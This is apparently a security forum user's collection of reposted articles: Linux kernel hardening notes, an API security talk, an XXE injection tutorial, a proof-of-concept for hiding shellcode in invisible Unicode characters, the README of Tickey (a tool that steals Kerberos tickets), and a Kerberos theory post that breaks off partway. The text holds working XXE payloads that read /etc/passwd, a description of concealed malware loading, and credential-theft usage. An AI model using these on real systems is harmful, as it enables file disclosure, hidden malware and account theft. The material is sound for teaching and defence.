
Posts posted by Nytro

-

-

Keynote - "What's in a Jailbreak? Hacking the iPhone: 2014 - 2019" - Mark Dowd BSides Canberra 2019

-

HUMBLE BOOK BUNDLE: HACKING 2.0 BY NO STARCH PRESS

A great way to strengthen your computer skills is to learn what's going on underneath. Let No Starch Press be your guide with this book bundle!

$475 WORTH OF AWESOME STUFF

PAY $1 OR MORE

DRM-FREE

MULTI-FORMAT

19,130 BUNDLES SOLD

Sursa: https://www.humblebundle.com/books/hacking-no-starch-press-books

-

May 27, 2019

security things in Linux v5.1

Previously: v5.0.

Linux kernel v5.1 has been released! Here are some security-related things that stood out to me:

introduction of pidfd

Christian Brauner landed the first portion of his work to remove pid races from the kernel: using a file descriptor to reference a process (“pidfd”). Now /proc/$pid can be opened and used as an argument for sending signals with the new pidfd_send_signal() syscall. This handle will only refer to the original process at the time the open() happened, and not to any later “reused” pid if the process dies and a new process is assigned the same pid. Using this method, it’s now possible to racelessly send signals to exactly the intended process without having to worry about pid reuse. (BTW, this commit wins the 2019 award for Most Well Documented Commit Log Justification.)

explicitly test for userspace mappings of heap memory

During Linux Conf AU 2019 Kernel Hardening BoF, Matthew Wilcox noted that there wasn’t anything in the kernel actually sanity-checking when userspace mappings were being applied to kernel heap memory (which would allow attackers to bypass the copy_{to,from}_user() infrastructure). Driver bugs or attackers able to confuse mappings wouldn’t get caught, so he added checks. To quote the commit logs: “It’s never appropriate to map a page allocated by SLAB into userspace” and “Pages which use page_type must never be mapped to userspace as it would destroy their page type”. The latter check almost immediately caught a bad case, which was quickly fixed to avoid page type corruption.

LSM stacking: shared security blobs

Casey Schaufler has landed one of the major pieces of getting multiple Linux Security Modules (LSMs) running at the same time (called “stacking”). It is now possible for LSMs to share the security-specific storage “blobs” associated with various core structures (e.g. inodes, tasks, etc) that LSMs can use for saving their state (e.g. storing which profile a given task is confined under). The kernel originally gave only the single active “major” LSM (e.g. SELinux, AppArmor, etc) full control over the entire blob of storage. With “shared” security blobs, the LSM infrastructure does the allocation and management of the memory, and LSMs use an offset for reading/writing their portion of it. This unblocks the way for “medium sized” LSMs (like SARA and Landlock) to get stacked with a “major” LSM as they need to store much more state than the “minor” LSMs (e.g. Yama, LoadPin) which could already stack because they didn’t need blob storage.

SafeSetID LSM

Micah Morton added the new SafeSetID LSM, which provides a way to narrow the power associated with the CAP_SETUID capability. Normally a process with CAP_SETUID can become any user on the system, including root, which makes it a meaningless capability to hand out to non-root users in order for them to “drop privileges” to some less powerful user. There are trees of processes under Chrome OS that need to operate under different user IDs and other methods of accomplishing these transitions safely weren’t sufficient. Instead, this provides a way to create a system-wide policy for user ID transitions via setuid() (and group transitions via setgid()) when a process has the CAP_SETUID capability, making it a much more useful capability to hand out to non-root processes that need to make uid or gid transitions.

ongoing: refcount_t conversions

Elena Reshetova continued landing more refcount_t conversions in core kernel code (e.g. scheduler, futex, perf), with an additional conversion in btrfs from Anand Jain. The existing conversions, mainly when combined with syzkaller, continue to show their utility at finding bugs all over the kernel.

ongoing: implicit fall-through removal

Gustavo A. R. Silva continued to make progress on marking more implicit fall-through cases. What’s so impressive to me about this work, like refcount_t, is how many bugs it has been finding (see all the “missing break” patches). It really shows how quickly the kernel benefits from adding -Wimplicit-fallthrough to keep this class of bug from ever returning.

stack variable initialization includes scalars

The structleak gcc plugin (originally ported from PaX) had its “by reference” coverage improved to initialize scalar types as well (making “structleak” a bit of a misnomer: it now stops leaks from more than structs). Barring compiler bugs, this means that all stack variables in the kernel can be initialized before use at function entry. For variables not passed to functions by reference, the -Wuninitialized compiler flag (enabled via -Wall) already makes sure the kernel isn’t building with local-only uninitialized stack variables. And now with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL enabled, all variables passed by reference will be initialized as well. This should eliminate most, if not all, uninitialized stack flaws with very minimal performance cost (for most workloads it is lost in the noise), though it does not have the stack data lifetime reduction benefits of GCC_PLUGIN_STACKLEAK, which wipes the stack at syscall exit. Clang has recently gained similar automatic stack initialization support, and I’d love to see this feature in native gcc. To evaluate the coverage of the various stack auto-initialization features, I also wrote regression tests in lib/test_stackinit.c.

That’s it for now; please let me know if I missed anything. The v5.2 kernel development cycle is off and running already.

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

Sursa: https://outflux.net/blog/archives/2019/05/27/security-things-in-linux-v5-1/

-

Common API security pitfalls

This page contains the resources for the talk titled "Common API security pitfalls". A recording is available at the bottom.

Abstract

The shift towards an API landscape indicates a significant evolution in the way we build applications. The rise of JavaScript and mobile applications has sparked an explosion of easily-accessible REST APIs. But how do you protect access to your API? Which security aspects are no longer relevant? Which security features are absolute must-haves, and which additional security measures do you need to take into account?

These are hard questions, as evidenced by the deployment of numerous insecure APIs. Attend this session to find out about common API security pitfalls, that often result in compromised user accounts and unauthorized access to your data. We expose the problem that lies at the root of each of these pitfalls, and offer actionable advice to address these security problems. After this session, you will know how to assess the security of your APIs, and the best practices to improve them towards the future.

About Philippe De Ryck

Philippe De Ryck is the founder of Pragmatic Web Security, where he travels the world to train developers on web security and security engineering. He holds a Ph.D. in web security from KU Leuven. Google recognizes Philippe as a Google Developer Expert for his knowledge of web security and security in Angular applications.

Sursa: https://pragmaticwebsecurity.com/talks/commonapisecuritypitfalls

-

XML external entity (XXE) injection

In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.

What is XML external entity injection?

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

How do XXE vulnerabilities arise?

Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.

XML external entities are a type of custom XML entity whose defined values are loaded from outside of the DTD in which they are declared. External entities are particularly interesting from a security perspective because they allow an entity to be defined based on the contents of a file path or URL.

What are the types of XXE attacks?

There are various types of XXE attacks:

- Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application's response.

- Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.

- Exploiting blind XXE to exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.

- Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.

Exploiting XXE to retrieve files

To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways:

- Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.

- Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

<?xml version="1.0" encoding="UTF-8"?>

<stockCheck><productId>381</productId></stockCheck>

The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<stockCheck><productId>&xxe;</productId></stockCheck>

This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application's response to include the contents of the file:

Invalid product ID: root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

...

Note

With real-world XXE vulnerabilities, there will often be a large number of data values within the submitted XML, any one of which might be used within the application's response. To test systematically for XXE vulnerabilities, you will generally need to test each data node in the XML individually, by making use of your defined entity and seeing whether it appears within the response.
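The node-by-node testing described in the note can be sketched in Python. This is a minimal illustration, not part of the original article: the helper name `entity_variants` and the `XXE_MARKER` placeholder are hypothetical, and the DOCTYPE is the one from the example above. It produces one request body per data node, each with the `&xxe;` entity placed in a single node, for use only against systems you are authorized to test.

```python
import xml.etree.ElementTree as ET

# DOCTYPE taken from the example payload above.
DOCTYPE = '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
# Hypothetical placeholder, swapped for the entity reference after serialization
# (ElementTree would otherwise escape the "&").
MARKER = "XXE_MARKER"


def entity_variants(xml_text):
    """Return one payload per text-bearing node, with &xxe; in that node only."""
    node_count = len(list(ET.fromstring(xml_text).iter()))
    variants = []
    for index in range(node_count):
        root = ET.fromstring(xml_text)  # fresh tree for every variant
        node = list(root.iter())[index]
        if not (node.text and node.text.strip()):
            continue  # skip nodes that carry no data value
        node.text = MARKER
        body = ET.tostring(root, encoding="unicode").replace(MARKER, "&xxe;")
        variants.append('<?xml version="1.0" encoding="UTF-8"?>\n' + DOCTYPE + "\n" + body)
    return variants


if __name__ == "__main__":
    sample = "<stockCheck><productId>381</productId><storeId>1</storeId></stockCheck>"
    for payload in entity_variants(sample):
        print(payload, end="\n\n")
```

Each variant is then submitted separately, and the response is checked for the file contents.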

Exploiting XXE to perform SSRF attacks

Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access.

To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the backend system. If not, then you will only be able to perform blind SSRF attacks (which can still have critical consequences).

In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure:

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>

Blind XXE vulnerabilities

Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.

Blind XXE vulnerabilities can still be detected and exploited, but more advanced techniques are required. You can sometimes use out-of-band techniques to find vulnerabilities and exploit them to exfiltrate data. And you can sometimes trigger XML parsing errors that lead to disclosure of sensitive data within error messages.

Finding hidden attack surface for XXE injection

Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML.

XInclude attacks

Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a backend SOAP request, which is then processed by the backend SOAP service.

In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">

<xi:include parse="text" href="file:///etc/passwd"/></foo>

XXE attacks via file upload

Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.

For example, an application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.

XXE attacks via modified content type

Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.

For example, if a normal request contains the following:

POST /action HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 7

foo=bar

Then you might be able to submit the following request, with the same result:

POST /action HTTP/1.0

Content-Type: text/xml

Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.
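The reformatting step can be sketched in Python as follows. This is an illustrative sketch rather than a tool from the article: `form_to_xml` and `build_post` are hypothetical helper names, and the conversion assumes a single form field, as in the example above. It rewrites the form body as XML and recomputes the Content-Length header.

```python
from urllib.parse import parse_qsl
from xml.sax.saxutils import escape

XML_DECL = '<?xml version="1.0" encoding="UTF-8"?>'


def form_to_xml(form_body: str) -> str:
    """Rewrite a one-field urlencoded body (e.g. 'foo=bar') as an XML document."""
    pairs = parse_qsl(form_body, keep_blank_values=True)
    if len(pairs) != 1:
        # Assumption of this sketch: exactly one field, so there is one root element.
        raise ValueError("this sketch handles exactly one form field")
    name, value = pairs[0]
    return f"{XML_DECL}<{name}>{escape(value)}</{name}>"


def build_post(path: str, content_type: str, body: str) -> bytes:
    """Build a raw HTTP/1.0 POST request with a matching Content-Length."""
    payload = body.encode("utf-8")
    head = (
        f"POST {path} HTTP/1.0\r\n"
        f"Content-Type: {content_type}\r\n"
        f"Content-Length: {len(payload)}\r\n\r\n"
    )
    return head.encode("ascii") + payload


if __name__ == "__main__":
    print(build_post("/action", "text/xml", form_to_xml("foo=bar")).decode())
```

For `foo=bar` this reproduces the second request above, including its Content-Length of 52.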

How to find and test for XXE vulnerabilities

The vast majority of XXE vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner.

Manually testing for XXE vulnerabilities generally involves:

- Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.

- Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.

- Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.

How to prevent XXE vulnerabilities

Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.

Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.
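As one possible illustration in Python, using only the standard library, the sketch below rejects any document that carries a DOCTYPE before handing it to ElementTree. The names `parse_untrusted` and `DTDForbidden` are hypothetical. Rejecting every DTD is stricter than only disabling external entities, and is an assumption that fits applications which never need DTDs.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when an untrusted document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it sees "<!DOCTYPE ...", before any entity is used.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing documents that declare a DTD."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)  # raises DTDForbidden, or ExpatError if malformed
    return ET.fromstring(data)


if __name__ == "__main__":
    print(parse_untrusted(b"<stockCheck><productId>381</productId></stockCheck>").findtext("productId"))
```

ElementTree does not process XInclude unless `xml.etree.ElementInclude.include()` is called explicitly, so in this sketch the XInclude case is handled by never calling it on untrusted input.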

-





PoC: Encoding Shellcode Into Invisible Unicode Characters

Malware has long used Unicode to hide or obfuscate URLs, filenames, scripts, etc. The Right-to-left Override character (e2 80 ae) is a classic. This post shares a PoC in which a shellcode is hidden (encoded) in a string in a Python script (this would probably work with other languages too), using invisible Unicode characters that most text editors do not display.

The idea is quite simple. We will choose three "invisible" unicode characters:

e2 80 8b : bit 0

e2 80 8c : bit 1

e2 80 8d : delimiter

With this, and having a potentially malicious script, we can encode the malicious script, bit by bit, into these unicode characters:

(delimiter e2 80 8d) .....encoded script (bit 0 to e2 80 8b, bit 1 to e2 80 8c)...... (delimiter e2 80 8d)

I have used this simple script to encode the malicious script:

https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/encode.py
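Independently of the linked encode.py, the bit-level scheme described above can be sketched in Python as follows. This is a minimal illustration written for this explanation, not the author's script: the function names `encode` and `decode` are hypothetical, and the payload here is just arbitrary bytes that are never executed.

```python
# The three invisible characters chosen above, given as code points.
ZERO = "\u200b"   # UTF-8: e2 80 8b, encodes bit 0
ONE = "\u200c"    # UTF-8: e2 80 8c, encodes bit 1
DELIM = "\u200d"  # UTF-8: e2 80 8d, marks start and end of the hidden data


def encode(data: bytes) -> str:
    """Turn bytes into an invisible string: delimiter, one char per bit, delimiter."""
    bits = "".join(f"{byte:08b}" for byte in data)
    return DELIM + "".join(ONE if bit == "1" else ZERO for bit in bits) + DELIM


def decode(text: str) -> bytes:
    """Recover the hidden bytes from the first delimited run found in text."""
    start = text.index(DELIM) + 1
    end = text.index(DELIM, start)
    bits = "".join("1" if ch == ONE else "0" for ch in text[start:end])
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


if __name__ == "__main__":
    carrier = "hello" + encode(b"hi") + " world"
    print(len(carrier), decode(carrier))
```

The carrier string displays as "hello world" in editors that do not render these characters, while carrying 18 extra code points for the two hidden bytes.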



Now, we can embed these encoded "invisible" unicode chars into a string. The following source code looks like a simple hello world:

https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/helloworld.py

However, if you download the file and open it with a hexadecimal editor, you can see all the encoded information that is part of the hello world string:

Most of the text editors that I tested didn't display the unicode characters: Visual Studio, Geany, Sublime, Notepad, browsers, etc...

The following script decodes and executes a secondary potentially malicious python script (the PoC script only executes calc) from invisible unicode characters:

https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious.py

And the following script decodes an x64 shellcode (the shellcode executes calc) from invisible unicode characters, then loads the shellcode with VirtualAlloc+WriteProtectMemory, and calls CreateThread to execute it:

https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious2_x64_shellcode.py

The previous scripts are quite obvious and suspicious, but if the encoded malicious script and these lines are mixed into longer and more complicated source code, it would probably be harder to notice that the script contains malicious code. So be careful when you download your favorite exploits!
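One way to check downloaded source for this kind of content is to scan it for Unicode format characters. The sketch below is an illustration only, and the helper name `find_hidden_characters` is hypothetical. It flags every character in Unicode category Cf, which includes the three characters used in this PoC as well as the Right-to-left Override.

```python
import unicodedata


def find_hidden_characters(source: str):
    """Return (line, column, code point) for each Unicode format (Cf) character."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if unicodedata.category(ch) == "Cf":
                findings.append((line_no, col, f"U+{ord(ch):04X}"))
    return findings


if __name__ == "__main__":
    sample = 'print("hi\u200b")\nx = 1\u202e'
    for finding in find_hidden_characters(sample):
        print(finding)
```

Category Cf also covers legitimate uses, such as joiners inside emoji sequences or a leading byte order mark, so findings need a manual look and are not proof of malicious content.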

I have not tested it, but this will probably work with other languages. Visual Studio, for example, doesn't show these characters in C source code.

-

Tickey

Tool to extract Kerberos tickets from Linux kernel keys.

Based on the paper Kerberos Credential Thievery (GNU/Linux).

Building

git clone https://github.com/TarlogicSecurity/tickey

cd tickey/tickey

make CONF=Release

After that, the binary should be in dist/Release/GNU-Linux/.

Execution

Arguments:

- -i => To perform process injection if it is needed

- -s => To not print in output (for injection)

Important: when it injects into another process, tickey performs an execve syscall which invokes its own binary from the context of another user. Therefore, to perform a successful injection, the binary must be in a folder which all users can access, like /tmp.

Execution example:

[root@Lab-LSV01 /]# /tmp/tickey -i

[*] krb5 ccache_name = KEYRING:session:sess_%{uid}

[+] root detected, so... DUMP ALL THE TICKETS!!

[*] Trying to inject in tarlogic[1000] session...

[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache

[*] Trying to inject in velociraptor[1120601115] session...

[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache

[*] Trying to inject in trex[1120601113] session...

[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache

[X] [uid:0] Error retrieving tickets

License

This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details.

You should have received a copy of the GNU Affero General Public License along with this program. If not, see https://www.gnu.org/licenses/.

Author

Eloy Pérez González @Zer1t0 at @Tarlogic - https://www.tarlogic.com/en/

Acknowledgment

Thanks to @TheXC3LL for his support with the binary injection.

-



Kerberos (I): How does Kerberos work? – Theory

20 - MAR - 2019 - ELOY PÉREZ

The objective of this series of posts is to clarify how Kerberos works, rather than just introduce the attacks, because it is often unclear why some techniques work and others do not. This knowledge makes it possible to know when to use each of those attacks in a pentest.

Therefore, after a long journey of diving into the documentation and several posts about the topic, we’ve tried to write in this post all the important details which an auditor should know in order to understand how to take advantage of the Kerberos protocol.

In this first post only the basic functionality will be discussed. Later posts will show how to perform the attacks and how the more complex aspects, such as delegation, work.

If anything about the topic is not well explained, do not be afraid to leave a comment or question about it. Now, onto the topic.

What is Kerberos?

Firstly, Kerberos is an authentication protocol, not an authorization protocol. In other words, it identifies each user, who provides a secret password; however, it does not validate which resources or services that user can access.

Kerberos is used in Active Directory. On this platform, Kerberos provides information about the privileges of each user, but it is the responsibility of each service to determine whether the user has access to its resources.

Kerberos items

In this section several components of the Kerberos environment will be studied.

Transport layer

Kerberos uses either UDP or TCP as its transport protocol, both of which send data in cleartext. Because of this, Kerberos itself is responsible for providing encryption.

The ports used by Kerberos are UDP/88 and TCP/88, on which the KDC (explained in the next section) should listen.

Agents

Several agents work together to provide authentication in Kerberos. These are the following:

- Client or user who wants to access the service.

- AP (Application Server), which offers the service required by the user.

- KDC (Key Distribution Center), the main service of Kerberos, responsible for issuing the tickets and installed on the DC (Domain Controller). It is supported by the AS (Authentication Service), which issues the TGTs.

Encryption keys

Kerberos handles several structures, such as tickets. Many of those structures are encrypted or signed to prevent tampering by third parties. The keys used for this are the following:

- KDC or krbtgt key, which is derived from the krbtgt account NTLM hash.

- User key, which is derived from the user NTLM hash.

- Service key, which is derived from the NTLM hash of the service owner, which can be a user or computer account.

- Session key, which is negotiated between the user and the KDC.

- Service session key, to be used between the user and the service.

Tickets

The main structures handled by Kerberos are the tickets. These tickets are delivered to users, who use them to perform several actions in the Kerberos realm. There are 2 types:

- The TGS (Ticket Granting Service) is the ticket which the user can use to authenticate against a service. It is encrypted with the service key.

- The TGT (Ticket Granting Ticket) is the ticket presented to the KDC to request TGSs. It is encrypted with the KDC key.

PAC

The PAC (Privilege Attribute Certificate) is a structure included in almost every ticket. This structure contains the privileges of the user and is signed with the KDC key.

Services can verify the PAC by communicating with the KDC, although this does not happen often. Moreover, PAC verification consists only of checking its signature, without inspecting whether the privileges inside the PAC are correct.

Furthermore, a client can avoid the inclusion of the PAC inside the ticket by specifying it in the KERB-PA-PAC-REQUEST field of the ticket request.

Messages

Kerberos uses different kinds of messages. The most interesting are the following:

- KRB_AS_REQ: Used to request the TGT from the KDC.

- KRB_AS_REP: Used by the KDC to deliver the TGT.

- KRB_TGS_REQ: Used to request the TGS from the KDC, using the TGT.

- KRB_TGS_REP: Used by the KDC to deliver the TGS.

- KRB_AP_REQ: Used to authenticate a user against a service, using the TGS.

- KRB_AP_REP: (Optional) Used by the service to identify itself to the user.

- KRB_ERROR: Message to communicate error conditions.

Additionally, even though it is part of NRPC rather than Kerberos, the AP can optionally use the KERB_VERIFY_PAC_REQUEST message to send the PAC signature to the KDC and verify that it is correct.

Below is shown a summary of the message sequence used to perform authentication:

Authentication process

In this section, the sequence of messages used to perform authentication will be studied, starting from a user without tickets up to being authenticated against the desired service.



KRB_AS_REQ

Firstly, the user must get a TGT from the KDC. To achieve this, a KRB_AS_REQ must be sent:

KRB_AS_REQ schema message

KRB_AS_REQ has, among others, the following fields:

- A timestamp encrypted with the client key, to authenticate the user and prevent replay attacks

- Username of the user being authenticated

- The service SPN associated with the krbtgt account

- A nonce generated by the user

Note: the encrypted timestamp is only necessary if the user requires preauthentication, which is the common case unless the DONT_REQ_PREAUTH flag is set on the user account.



KRB_AS_REP

After receiving the request, the KDC verifies the user identity by decrypting the timestamp. If the message is correct, it must respond with a KRB_AS_REP:

KRB_AS_REP schema message

KRB_AS_REP includes the following information:

- Username

- TGT, which includes:

  - Username

  - Session key

  - Expiration date of TGT

  - PAC with user privileges, signed by KDC

- Some data encrypted with the user key, which includes:

  - Session key

  - Expiration date of TGT

  - User nonce, to prevent replay attacks

Once this is done, the user has the TGT, which can be used to request TGSs and afterwards access the services.



KRB_TGS_REQ

In order to request a TGS, a KRB_TGS_REQ message must be sent to the KDC:

KRB_TGS_REQ schema message

KRB_TGS_REQ includes:

- Data encrypted with the session key:

  - Username

  - Timestamp

- TGT

- SPN of requested service

- Nonce generated by user



KRB_TGS_REP

After receiving the KRB_TGS_REQ message, the KDC returns a TGS inside a KRB_TGS_REP:

KRB_TGS_REP schema message

KRB_TGS_REP includes:

- Username

- TGS, which contains:

  - Service session key

  - Username

  - Expiration date of TGS

  - PAC with user privileges, signed by KDC

- Data encrypted with the session key:

  - Service session key

  - Expiration date of TGS

  - User nonce, to prevent replay attacks



KRB_AP_REQ

To finish, if everything went well, the user now has a valid TGS to interact with the service. In order to use it, the user must send a KRB_AP_REQ message to the AP:

KRB_AP_REQ schema message

KRB_AP_REQ includes:

- TGS

- Data encrypted with the service session key:

  - Username

  - Timestamp, to avoid replay attacks

After that, if the user privileges are right, the user can access the service. In the uncommon case that PAC verification is enabled, the AP will verify the PAC against the KDC. Also, if mutual authentication is needed, the AP will respond to the user with a KRB_AP_REP message.
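The three exchanges described in this section can be put together in a toy Python model. This is only a sketch for following which key protects which piece of data. It is not real Kerberos: the `Sealed` class is a hypothetical stand-in for encryption that simply refuses to open with the wrong key, all class and function names are made up for this example, and the PAC, expiration dates and timestamp validation are left out.

```python
import secrets
import time
from dataclasses import dataclass


@dataclass(frozen=True)
class Sealed:
    """Toy stand-in for encryption: the payload opens only with the same key."""
    key: bytes
    payload: dict

    def open(self, key: bytes) -> dict:
        if not secrets.compare_digest(key, self.key):
            raise PermissionError("wrong key")
        return self.payload


class KDC:
    def __init__(self, user_keys: dict, service_keys: dict):
        self.krbtgt_key = secrets.token_bytes(16)
        self.user_keys = user_keys        # username -> user key
        self.service_keys = service_keys  # SPN -> service key

    def as_exchange(self, username, enc_timestamp, nonce):
        """KRB_AS_REQ in, KRB_AS_REP out: a TGT plus data sealed with the user key."""
        user_key = self.user_keys[username]
        enc_timestamp.open(user_key)  # preauthentication: only the user key opens it
        session_key = secrets.token_bytes(16)
        tgt = Sealed(self.krbtgt_key, {"user": username, "session_key": session_key})
        return tgt, Sealed(user_key, {"session_key": session_key, "nonce": nonce})

    def tgs_exchange(self, tgt, authenticator, spn, nonce):
        """KRB_TGS_REQ in, KRB_TGS_REP out: a TGS plus data sealed with the session key."""
        tgt_data = tgt.open(self.krbtgt_key)
        session_key = tgt_data["session_key"]
        if authenticator.open(session_key)["user"] != tgt_data["user"]:
            raise PermissionError("authenticator does not match TGT")
        service_session_key = secrets.token_bytes(16)
        tgs = Sealed(self.service_keys[spn],
                     {"user": tgt_data["user"], "service_session_key": service_session_key})
        return tgs, Sealed(session_key,
                           {"service_session_key": service_session_key, "nonce": nonce})


class Service:
    def __init__(self, key: bytes):
        self.key = key

    def ap_exchange(self, tgs, authenticator):
        """KRB_AP_REQ in: returns the username if the TGS and authenticator agree."""
        tgs_data = tgs.open(self.key)
        auth = authenticator.open(tgs_data["service_session_key"])
        if auth["user"] != tgs_data["user"]:
            raise PermissionError("authenticator does not match TGS")
        return tgs_data["user"]


def authenticate(kdc, service, username, user_key, spn):
    """Run the AS, TGS and AP exchanges in order, as the client would."""
    nonce = secrets.token_hex(8)
    tgt, reply = kdc.as_exchange(username, Sealed(user_key, {"timestamp": time.time()}), nonce)
    as_data = reply.open(user_key)
    if as_data["nonce"] != nonce:
        raise PermissionError("unexpected nonce in KRB_AS_REP")
    session_key = as_data["session_key"]

    nonce = secrets.token_hex(8)
    authenticator = Sealed(session_key, {"user": username, "timestamp": time.time()})
    tgs, reply = kdc.tgs_exchange(tgt, authenticator, spn, nonce)
    tgs_data = reply.open(session_key)
    if tgs_data["nonce"] != nonce:
        raise PermissionError("unexpected nonce in KRB_TGS_REP")

    authenticator = Sealed(tgs_data["service_session_key"],
                           {"user": username, "timestamp": time.time()})
    return service.ap_exchange(tgs, authenticator)


if __name__ == "__main__":
    alice_key, service_key = secrets.token_bytes(16), secrets.token_bytes(16)
    kdc = KDC({"alice": alice_key}, {"cifs/fileserver": service_key})
    print(authenticate(kdc, Service(service_key), "alice", alice_key, "cifs/fileserver"))
```

In this model the client never opens the TGT or the TGS itself: it only forwards them, and learns the session keys from the parts sealed with a key it already holds.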

Attacks

Based on the authentication process explained above, this section explains the attacks aimed at compromising Active Directory.

Overpass The Hash/Pass The Key (PTK)

The popular Pass The Hash (PTH) attack consists of using the user hash to impersonate that user. In the context of Kerberos this is known as Overpass The Hash or Pass The Key.

If an attacker gets the hash of any user, they can impersonate that user against the KDC and then gain access to several services.

User hashes can be extracted from SAM files in workstations or the NTDS.DIT file of DCs, as well as from the lsass process memory (by using Mimikatz), where it is also possible to find cleartext passwords.

Pass The Ticket (PTT)

The Pass The Ticket technique is about getting a user ticket and using it to impersonate that user. However, besides the ticket, it is also necessary to obtain the session key in order to use the ticket.

It is possible to obtain the ticket by performing a Man-In-The-Middle attack, since Kerberos is sent over TCP or UDP. However, this technique does not give access to the session key.

